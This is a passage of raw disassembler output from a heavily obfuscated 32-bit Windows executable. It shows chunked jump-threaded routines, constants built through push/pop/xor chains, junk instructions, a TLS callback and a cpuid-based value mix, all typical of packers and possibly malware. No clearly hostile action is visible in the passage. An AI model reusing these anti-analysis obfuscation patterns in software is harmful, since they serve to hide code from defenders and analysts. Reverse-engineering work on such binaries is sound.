mov [esp+0], eax
pop eax
and ecx, 7
call sub_42B405
loc_42308D: ; CODE XREF: sub_428BBD+20F9�j
jmp loc_4259F0
sub_423081 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_423092: ; CODE XREF: _94j21ax3:004212B5�j
mov edx, esi
; =============== S U B R O U T I N E =======================================
sub_423094 proc near ; CODE XREF: sub_428F6D+A�p
xchg edi, [esp+0]
loc_423097: ; CODE XREF: _94j21ax3:loc_4236CB�j
pop edi
push ecx
push 0F7A2E535h
pop ecx
jmp loc_42383A
sub_423094 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42426B
loc_4230A4: ; CODE XREF: sub_42426B+DD8�j
xor eax, ebp
sub edx, ebp
loc_4230A8: ; CODE XREF: sub_42875C:loc_4282AE�j
push ebp
push esi
loc_4230AA: ; CODE XREF: _94j21ax3:00427B65�j
jmp loc_421D5D
; END OF FUNCTION CHUNK FOR sub_42426B
; ---------------------------------------------------------------------------
mov ds:dword_42C208, eax
xor eax, eax
mov [ebp-4], eax
; START OF FUNCTION CHUNK FOR sub_4248E7
loc_4230B9: ; CODE XREF: sub_4248E7-3744�j
; _94j21ax3:0042520A�j
jno loc_42B789
call sub_429F43
loc_4230C4: ; CODE XREF: sub_421CAA+56B0�j
jmp nullsub_62
; END OF FUNCTION CHUNK FOR sub_4248E7
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_4230C9: ; CODE XREF: sub_42284F-4DF�j
mov [edx], esi
jmp loc_4270AE
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425324
loc_4230D0: ; CODE XREF: sub_425324+530E�j
jp loc_426475
jnb sub_424839
sbb ebx, edi
shr eax, 7
jmp loc_428CAA
; END OF FUNCTION CHUNK FOR sub_425324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423614
loc_4230E6: ; CODE XREF: sub_423614+787A�j
jno loc_422FE6
xchg ecx, [ebx]
adc ebp, 0CF930D44h
and ecx, ebx
jmp loc_42665B
; END OF FUNCTION CHUNK FOR sub_423614
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4244A5
loc_4230FB: ; CODE XREF: sub_4244A5+11�j
call sub_42221F
loc_423100: ; CODE XREF: _94j21ax3:004278BF�j
jmp loc_4221F6
; END OF FUNCTION CHUNK FOR sub_4244A5
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42780F
loc_423105: ; CODE XREF: sub_42780F+17�j
jmp loc_423585
; END OF FUNCTION CHUNK FOR sub_42780F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4290B2
loc_42310A: ; CODE XREF: sub_4290B2+9�j
push offset loc_42BD57
jmp nullsub_65
; END OF FUNCTION CHUNK FOR sub_4290B2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_427D65
loc_423114: ; CODE XREF: sub_427D65:loc_423D6F�j
cpuid
add [esi], eax
xor [esi], ebx
add [esi], ecx
xor [esi], edx
jmp loc_421E46
; END OF FUNCTION CHUNK FOR sub_427D65
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428B5E
loc_423123: ; CODE XREF: sub_428B5E:loc_425138�j
xor edi, ebx
jmp loc_426F1A
; END OF FUNCTION CHUNK FOR sub_428B5E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42484C
loc_42312A: ; CODE XREF: sub_42484C:loc_423D36�j
jz loc_4266BA
adc ebp, 0D16FABCBh
jmp sub_42B358
; END OF FUNCTION CHUNK FOR sub_42484C
; ---------------------------------------------------------------------------
loc_42313B: ; CODE XREF: _94j21ax3:loc_42C0B7�j
mov eax, [eax+0Ch]
push offset sub_428A1C
jmp locret_423368
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42270C
loc_423148: ; CODE XREF: sub_42270C:loc_42562A�j
; sub_42270C+5B13�j
call sub_4210AA
mov edx, 0DE6CF580h
call sub_4239A5
push eax
jmp loc_42A861
; END OF FUNCTION CHUNK FOR sub_42270C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_42315D proc near ; CODE XREF: sub_42B83A�j
; FUNCTION CHUNK AT 004289D7 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 0042BDC6 SIZE 0000000F BYTES
push ebp
mov ebp, esp
loc_423160: ; CODE XREF: TlsCallback_0:loc_423F94�j
push ecx
jmp loc_4289D7
sub_42315D endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424C37
loc_423166: ; CODE XREF: sub_424C37:loc_4217A8�j
push 7A4262D5h
sbb edx, 2ED38807h
mov edi, ecx
jns loc_422997
jmp loc_429B6C
; END OF FUNCTION CHUNK FOR sub_424C37
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_80. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42265F
loc_42317F: ; CODE XREF: sub_42265F+91CA�j
jmp loc_429215
; END OF FUNCTION CHUNK FOR sub_42265F
; ---------------------------------------------------------------------------
loc_423184: ; CODE XREF: _94j21ax3:004250E7�j
jmp loc_4277C6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_424D8C
loc_423189: ; CODE XREF: sub_424D8C-33AB�j
jmp loc_42B630
; END OF FUNCTION CHUNK FOR sub_424D8C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423324
loc_42318E: ; CODE XREF: sub_423324:loc_423353�j
; sub_423324+19FD�j
push esi
push 0EE85DFD5h
pop esi
or esi, 0EDA2955Dh
add esi, 109AE507h
call sub_422609
sub edx, ebx
push 7E427920h
jmp sub_4271F1
; END OF FUNCTION CHUNK FOR sub_423324
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_429259
loc_4231B2: ; CODE XREF: sub_429259:loc_426A2F�j
xor edx, 12EB0680h
call sub_4239A5
call sub_42A63F
loc_4231C2: ; CODE XREF: _94j21ax3:004287FA�j
jmp sub_4239A5
; END OF FUNCTION CHUNK FOR sub_429259
; ---------------------------------------------------------------------------
loc_4231C7: ; CODE XREF: _94j21ax3:00423B1B�j
jb loc_42A442
; =============== S U B R O U T I N E =======================================
sub_4231CD proc near ; CODE XREF: sub_425934+B17�p
; FUNCTION CHUNK AT 0042B13A SIZE 0000000A BYTES
mov [esp+0], eax
pop eax
push eax
jmp loc_42B13A
sub_4231CD endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42771C
loc_4231D7: ; CODE XREF: sub_42771C:loc_421BBE�j
push offset loc_4270D9
jmp nullsub_49
; END OF FUNCTION CHUNK FOR sub_42771C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423B78
loc_4231E1: ; CODE XREF: sub_423B78:loc_423B87�j
sub ebx, 10000h
mov eax, [ebx]
neg eax
cmp ax, 0A5B3h
jnz loc_423B81
retn
; ---------------------------------------------------------------------------
loc_4231F6: ; CODE XREF: sub_423B78:loc_423B81�j
sub ebx, 10000h
jmp loc_421794
; END OF FUNCTION CHUNK FOR sub_423B78
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42BD03
loc_423201: ; CODE XREF: sub_42BD03:loc_4215E5�j
jnz loc_4222A4
jmp loc_422481
; END OF FUNCTION CHUNK FOR sub_42BD03
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_130. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42C0BC
loc_42320D: ; CODE XREF: sub_42C0BC+AD�j
jmp loc_42AFD1
; END OF FUNCTION CHUNK FOR sub_42C0BC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428BBD
loc_423212: ; CODE XREF: sub_428BBD-91F�j
jmp loc_426E71
; END OF FUNCTION CHUNK FOR sub_428BBD
; ---------------------------------------------------------------------------
push edi
push 33D29570h
mov edi, offset loc_424E7B
xchg edi, [esp]
retn
; ---------------------------------------------------------------------------
add eax, 6BBD9B7Eh
jmp loc_426C78
; ---------------------------------------------------------------------------
popf
jno loc_42397F
jmp sub_42BB8A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42982D
loc_42323D: ; CODE XREF: sub_42982D+248E�j
jno loc_42A8D7
pushf
jp loc_424B80
loc_42324A: ; CODE XREF: sub_42982D:loc_422628�j
push esi
push 0C7BBAE52h
pop esi
add esi, 3886943Ch
xchg esi, [esp+0]
jmp sub_429BC2
; END OF FUNCTION CHUNK FOR sub_42982D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421CAA
loc_42325F: ; CODE XREF: _94j21ax3:loc_424EF4�j
; sub_421CAA+4EF3�j
shr edi, 0Ah
push ebp
test esi, 2AD8E43Bh
jmp loc_4280C7
; END OF FUNCTION CHUNK FOR sub_421CAA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42AA07
loc_42326E: ; CODE XREF: sub_42AA07+C�j
push offset sub_426562
jmp loc_421A9A
; END OF FUNCTION CHUNK FOR sub_42AA07
; =============== S U B R O U T I N E =======================================
; Attributes: thunk
sub_423278 proc near ; CODE XREF: sub_428694:loc_427F9D�j
retn
sub_423278 endp
; ---------------------------------------------------------------------------
loc_423279: ; CODE XREF: _94j21ax3:0042C4CB�j
jmp loc_42B2BC
; ---------------------------------------------------------------------------
loc_42327E: ; CODE XREF: _94j21ax3:0042B49D�j
jo loc_42AE4E
; =============== S U B R O U T I N E =======================================
sub_423284 proc near ; CODE XREF: sub_428AE1+1�p
; FUNCTION CHUNK AT 004219BC SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004224EA SIZE 00000014 BYTES
; FUNCTION CHUNK AT 004239DF SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004265BD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B06F SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042B6F1 SIZE 00000015 BYTES
mov [esp+0], esi
pop esi
mov ebp, esp
jmp loc_4265BD
sub_423284 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_42328F proc near ; CODE XREF: sub_42C24F:loc_421EEB�p
; _94j21ax3:00429A35�j
; FUNCTION CHUNK AT 0042417A SIZE 00000008 BYTES
; FUNCTION CHUNK AT 004267B4 SIZE 00000005 BYTES
xchg ecx, [esp+0]
pop ecx
push ecx
push 0F9BA941Fh
pop ecx
add ecx, 687AD63h
jmp loc_42417A
sub_42328F endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42284F
loc_4232A5: ; CODE XREF: sub_42284F+22DD�j
test eax, 4
jmp loc_424354
; END OF FUNCTION CHUNK FOR sub_42284F
; ---------------------------------------------------------------------------
pushf
jmp sub_421457
; =============== S U B R O U T I N E =======================================
sub_4232B6 proc near ; CODE XREF: sub_422FDC+3EAE�p
; sub_4238D1+746E�j
xchg esi, [esp+0]
pop esi
mov [ebp-0Ch], eax
sub_4232B6 endp ; sp-analysis failed
; START OF FUNCTION CHUNK FOR sub_4225A5
loc_4232BD: ; CODE XREF: sub_4225A5+B�j
; sub_422FDC+B90�j ...
mov eax, [ebp-20h]
call sub_42A5B9
loc_4232C5: ; CODE XREF: sub_4266F6:loc_42C5C1�j
mov edx, 65DE9EC5h
call sub_4239A5
push eax
ror eax, 5
push edi
push 4C962A6h
pop edi
jmp loc_424061
; END OF FUNCTION CHUNK FOR sub_4225A5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_74. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_422FC8
loc_4232E0: ; CODE XREF: sub_422FC8+567D�j
jmp loc_428318
; END OF FUNCTION CHUNK FOR sub_422FC8
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4272E9
loc_4232E5: ; CODE XREF: sub_4272E9-4DC1�j
; sub_42A277-72CE�j
jmp loc_427698
; END OF FUNCTION CHUNK FOR sub_4272E9
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421689
loc_4232EA: ; CODE XREF: sub_421689:loc_4257AC�j
jnz loc_421716
jmp loc_42688B
; END OF FUNCTION CHUNK FOR sub_421689
; =============== S U B R O U T I N E =======================================
sub_4232F5 proc near ; CODE XREF: _94j21ax3:00422F76�j
; sub_427AEB:loc_42C33E�p
; FUNCTION CHUNK AT 00422C87 SIZE 0000001F BYTES
; FUNCTION CHUNK AT 0042514A SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00428B59 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429A6C SIZE 00000017 BYTES
; FUNCTION CHUNK AT 0042C1A3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C3F5 SIZE 00000010 BYTES
mov [esp+0], esi
pop esi
jnz loc_42C1A3
mov eax, [ebp+8]
or dword ptr [eax-8], 4
mov eax, [ebp-4]
movzx eax, byte ptr [eax]
mov edx, [ebp+8]
jmp loc_429A6C
sub_4232F5 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42426B
loc_423314: ; CODE XREF: sub_42426B+1E�j
mov edx, [edx]
mov byte ptr [eax+edx], 0
call sub_429897
loc_42331F: ; CODE XREF: sub_42B83A+9�j
jmp loc_42A544
; END OF FUNCTION CHUNK FOR sub_42426B
; =============== S U B R O U T I N E =======================================
sub_423324 proc near ; CODE XREF: _94j21ax3:00422861�j
; sub_428709+3�p
var_38 = dword ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_20 = dword ptr -20h
var_14 = dword ptr -14h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004212C5 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 004216F7 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00421812 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00421933 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 004219FD SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00421A63 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00421B13 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00421CFE SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00422016 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00422080 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004220E5 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00422157 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004223C3 SIZE 0000002C BYTES
; FUNCTION CHUNK AT 00422734 SIZE 00000016 BYTES
; FUNCTION CHUNK AT 00422AD0 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00422B27 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00422F46 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042318E SIZE 00000024 BYTES
; FUNCTION CHUNK AT 00423950 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042398D SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00423AED SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00423D74 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00423DDB SIZE 0000001F BYTES
; FUNCTION CHUNK AT 00424094 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004243B4 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 004243F2 SIZE 00000017 BYTES
; FUNCTION CHUNK AT 00424798 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424C48 SIZE 00000008 BYTES
; FUNCTION CHUNK AT 00424CE8 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00424D0D SIZE 00000019 BYTES
; FUNCTION CHUNK AT 00425099 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00425556 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00425642 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 004257B7 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425861 SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042594E SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00425AB3 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 00426680 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00426CA8 SIZE 0000001C BYTES
; FUNCTION CHUNK AT 00426D2D SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00426F05 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427052 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00427165 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00427260 SIZE 0000001D BYTES
; FUNCTION CHUNK AT 00427732 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 0042786E SIZE 00000018 BYTES
; FUNCTION CHUNK AT 00427B91 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00427EAE SIZE 00000010 BYTES
; FUNCTION CHUNK AT 004280C1 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004283C5 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 00428ABD SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00428D12 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00428D8F SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00429032 SIZE 0000001B BYTES
; FUNCTION CHUNK AT 00429088 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004293C1 SIZE 0000001A BYTES
; FUNCTION CHUNK AT 00429596 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 00429640 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004297D4 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 00429A45 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 00429AAF SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00429C97 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00429F28 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00429F68 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042A1DE SIZE 00000007 BYTES
; FUNCTION CHUNK AT 0042A3CE SIZE 00000014 BYTES
; FUNCTION CHUNK AT 0042A584 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0042A93B SIZE 00000011 BYTES
; FUNCTION CHUNK AT 0042AA3E SIZE 00000010 BYTES
; FUNCTION CHUNK AT 0042B5CB SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0042B8C2 SIZE 00000003 BYTES
; FUNCTION CHUNK AT 0042B920 SIZE 00000022 BYTES
; FUNCTION CHUNK AT 0042B9A8 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0042BAA2 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042BABD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042BE96 SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0042C0AC SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0042C20C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0042C2FD SIZE 0000001D BYTES
mov [esp+2Ch+var_2C], edx
pop edx
push ecx
mov esp, ebp
pop ebp
push 0A491833Ch
pop eax
jmp loc_423440
; ---------------------------------------------------------------------------
loc_423337: ; CODE XREF: sub_427A68-3761�j
jz loc_42C0AC
pop large dword ptr fs:0
call sub_42166E
loc_423349: ; CODE XREF: sub_4294B3+204�j
jmp loc_427165
; ---------------------------------------------------------------------------
loc_42334E: ; CODE XREF: sub_4252DD+14�j
jmp nullsub_45
; ---------------------------------------------------------------------------
loc_423353: ; CODE XREF: sub_42966A:loc_42512E�j
jz loc_42318E
jmp loc_424D0D
; ---------------------------------------------------------------------------
push 2DFCF63Fh
jmp sub_421DC4
; ---------------------------------------------------------------------------
locret_423368: ; CODE XREF: _94j21ax3:00423143�j
retn
; ---------------------------------------------------------------------------
loc_423369: ; CODE XREF: sub_427CB6+12�j
jmp loc_425556
; ---------------------------------------------------------------------------
add esi, 8EB850E8h
jmp sub_421B3A
; ---------------------------------------------------------------------------
loc_423379: ; CODE XREF: sub_42C3BD-10B4�j
jns loc_42284A
jmp loc_422734
; ---------------------------------------------------------------------------
locret_423384: ; CODE XREF: sub_42A389:loc_421929�j
retn
; ---------------------------------------------------------------------------
loc_423385: ; CODE XREF: sub_42BD03-203E�j
jmp loc_421812
; ---------------------------------------------------------------------------
shl esi, 10h
jmp loc_425866
; ---------------------------------------------------------------------------
locret_423392: ; CODE XREF: sub_428A1C+11�j
retn
; ---------------------------------------------------------------------------
loc_423393: ; CODE XREF: sub_4289CF+213C�j
jmp nullsub_16
; ---------------------------------------------------------------------------
loc_423398: ; CODE XREF: sub_422392:loc_4291F5�j
mov [ebp-4], eax
mov eax, [ebp-10h]
push offset sub_42BC39
jmp loc_4280C1
; ---------------------------------------------------------------------------
locret_4233A8: ; CODE XREF: _94j21ax3:loc_427613�j
retn
; ---------------------------------------------------------------------------
loc_4233A9: ; CODE XREF: sub_423F55-1D79�j
mov eax, [ebp-4]
inc eax
mov eax, [eax]
add eax, [ebp-4]
jmp loc_425861
; ---------------------------------------------------------------------------
loc_4233B7: ; CODE XREF: sub_421480:loc_421AE4�j
add eax, 0CABB093Ch
push eax
push 2CEA325h
pop eax
sub eax, 0D7CF1A30h
rol eax, 11h
test eax, 20000000h
jmp loc_42B9A8
; ---------------------------------------------------------------------------
loc_4233D8: ; DATA XREF: sub_423C51+3B18�o
call sub_421EAD
cmp eax, [ebp-8]
jnz loc_429C97
mov eax, [ebp-14h]
mov eax, [eax+24h]
call sub_42B4F1
loc_4233F1: ; CODE XREF: sub_4214E6+7BFF�j
jmp loc_42A1DE
; ---------------------------------------------------------------------------
loc_4233F6: ; CODE XREF: sub_426E5C+10�j
jmp loc_423D74
; ---------------------------------------------------------------------------
loc_4233FB: ; CODE XREF: sub_42BC39-67D3�j
jmp loc_427052
; ---------------------------------------------------------------------------
loc_423400: ; CODE XREF: sub_42C5E8-54A�j
xchg edx, [eax]
loc_423402: ; CODE XREF: sub_42C5E8:loc_423CFD�j
push offset sub_42AAC3
jmp nullsub_17
; ---------------------------------------------------------------------------
dword_42340C dd 0B4D3BF30h ; DATA XREF: sub_423EA4+3�w
; sub_424A57-95D�r
; ---------------------------------------------------------------------------
loc_423410: ; CODE XREF: sub_422048+5168�j
jmp nullsub_18
; ---------------------------------------------------------------------------
db 0D2h, 78h, 76h
dword_423418 dd 0F3D04CBBh ; DATA XREF: sub_42A9E7-2F55�r
; sub_425790+2856�w
; ---------------------------------------------------------------------------
loc_42341C: ; CODE XREF: sub_428AE1+6A6�j
jmp loc_42398D
; ---------------------------------------------------------------------------
loc_423421: ; CODE XREF: sub_429DCC-4DBE�j
jmp loc_426680
; ---------------------------------------------------------------------------
dw 10E6h
dword_423428 dd 0FCE2CDEEh ; DATA XREF: _94j21ax3:004276ED�r
; sub_4288BF+E�w
; ---------------------------------------------------------------------------
loc_42342C: ; CODE XREF: sub_426716-4982�j
jmp loc_429AAF
; ---------------------------------------------------------------------------
db 0FAh, 39h, 0E1h
dword_423434 dd 0E736A377h ; DATA XREF: sub_423505:loc_42350C�w
; sub_42AB30+9�r
dword_423438 dd 0E088EFCFh ; DATA XREF: sub_4239F1-278C�w
; _94j21ax3:00423B37�r
dword_42343C dd 0 ; DATA XREF: sub_426716:loc_423E83�w
; sub_428381+4�w ...
; ---------------------------------------------------------------------------
loc_423440: ; CODE XREF: sub_423324+E�j
jmp loc_427EAE
sub_423324 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
db 0C5h, 0FCh, 3Ah
db 0CCh
db 0A4h, 0DCh, 0BCh
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_421D33
loc_42344C: ; CODE XREF: sub_421D33+38BD�j
jmp loc_42758A
; END OF FUNCTION CHUNK FOR sub_421D33
; ---------------------------------------------------------------------------
db 98h, 50h, 0AEh
dword_423454 dd 0BCh ; DATA XREF: _94j21ax3:00427292�w
; sub_423324+5D16�w ...
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_425868
loc_423458: ; CODE XREF: sub_425868:loc_425873�j
mov ebp, esp
call sub_429C27
loc_42345F: ; CODE XREF: sub_422898+FD0�j
jmp loc_424E49
; END OF FUNCTION CHUNK FOR sub_425868
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_163. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_423614
loc_423465: ; CODE XREF: sub_423614+3A5D�j
jmp loc_42C508
; END OF FUNCTION CHUNK FOR sub_423614
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_42346A: ; CODE XREF: sub_42A0CC-296B�j
pushf
loc_42346B: ; CODE XREF: sub_42A0CC:loc_42C5DD�j
mov eax, 63h
push ecx
push offset sub_42BD30
jmp nullsub_201
; END OF FUNCTION CHUNK FOR sub_42A0CC
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_428BBD
loc_42347B: ; CODE XREF: sub_428BBD:loc_425A25�j
mov edx, eax
sub ecx, edi
adc eax, ecx
jmp loc_42A6C0
; END OF FUNCTION CHUNK FOR sub_428BBD
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42851E
loc_423486: ; CODE XREF: sub_42851E:loc_42852F�j
push 47B3F68Bh
pop ecx
xor ecx, 0CF4CB7BFh
sub ecx, ds:4000F4h
jmp loc_42433F
; END OF FUNCTION CHUNK FOR sub_42851E
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_426DA4
loc_42349D: ; CODE XREF: sub_426DA4:loc_42A73C�j
pushf
mov [esp+4+var_4], ecx
push 0B85C8475h
pop ecx
jmp loc_42B5FC
; END OF FUNCTION CHUNK FOR sub_426DA4
; ---------------------------------------------------------------------------
adc eax, 0A01F1FBh
; START OF FUNCTION CHUNK FOR sub_428993
loc_4234B2: ; CODE XREF: sub_428993-209E�j
jmp sub_427021
; END OF FUNCTION CHUNK FOR sub_428993
; ---------------------------------------------------------------------------
xor edi, esi
jmp sub_42AA78
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_4234BE: ; CODE XREF: sub_42A0CC-237E�j
adc ebp, esi
loc_4234C0: ; CODE XREF: sub_42A0CC:loc_42699B�j
mov eax, 62h
call sub_425A09
jmp loc_4250AC
; END OF FUNCTION CHUNK FOR sub_42A0CC
; ---------------------------------------------------------------------------
jmp loc_4298E4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_4234D4: ; CODE XREF: sub_42A0CC:loc_427C89�j
call nullsub_7
jmp loc_42AB58
; END OF FUNCTION CHUNK FOR sub_42A0CC
; ---------------------------------------------------------------------------
cmp dword ptr [ebp-0Ch], 0
jz loc_4234F1
mov eax, [ebp-0Ch]
push eax
call sub_42B079
; START OF FUNCTION CHUNK FOR sub_423F55
loc_4234F1: ; CODE XREF: _94j21ax3:004234E2�j
; sub_423F55+B62�j ...
push 0E5D4B937h
jmp loc_427B96
; END OF FUNCTION CHUNK FOR sub_423F55
; ---------------------------------------------------------------------------
loc_4234FB: ; CODE XREF: _94j21ax3:0042BD6F�j
mov edx, offset sub_429259
call sub_429251
; =============== S U B R O U T I N E =======================================
sub_423505 proc near ; CODE XREF: sub_421B3A+8�p
; _94j21ax3:004257DC�j
; FUNCTION CHUNK AT 0042B08D SIZE 00000005 BYTES
mov [esp+0], ebx
pop ebx
ror eax, 18h
loc_42350C: ; CODE XREF: _94j21ax3:00421D3F�j
mov ds:dword_423434, eax
jmp loc_42B08D
sub_423505 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_423517 proc near ; DATA XREF: _94j21ax3:004235E0�o
; FUNCTION CHUNK AT 0042B81D SIZE 00000005 BYTES
push 97F7B2D2h
or edi, ecx
jmp loc_42B81D
sub_423517 endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A268
loc_423523: ; CODE XREF: sub_42A268-1FEE�j
jb loc_42A1ED
cdq
jmp loc_428D8F
; END OF FUNCTION CHUNK FOR sub_42A268
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR TlsCallback_0
loc_42352F: ; CODE XREF: TlsCallback_0-2240�j
test eax, esi
jmp loc_423F94
; END OF FUNCTION CHUNK FOR TlsCallback_0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42972F
loc_423536: ; CODE XREF: sub_42972F+15E�j
push 0AD176414h
xor [esp+4+var_4], 562EC145h
xor [esp+4+var_4], 0FB39A551h
push 10h
push edx
push 2F8C3B41h
jmp loc_423934
; END OF FUNCTION CHUNK FOR sub_42972F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42430C
loc_423556: ; CODE XREF: sub_42430C+E�j
or eax, eax
jnz loc_428CDA
call sub_4210AA
mov edx, 1AE260E8h
jmp loc_428FF6
; END OF FUNCTION CHUNK FOR sub_42430C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_42A0CC
loc_42356D: ; CODE XREF: sub_42A0CC-8AA4�j
; sub_42A0CC:loc_426D93�j
call sub_429629
; END OF FUNCTION CHUNK FOR sub_42A0CC
; START OF FUNCTION CHUNK FOR sub_42284F
loc_423572: ; CODE XREF: sub_42284F-12A1�j
shr edx, 8
loc_423575: ; CODE XREF: sub_42284F:loc_428160�j
lea eax, [ebp-26Fh]
push offset sub_427668
jmp loc_42AB48
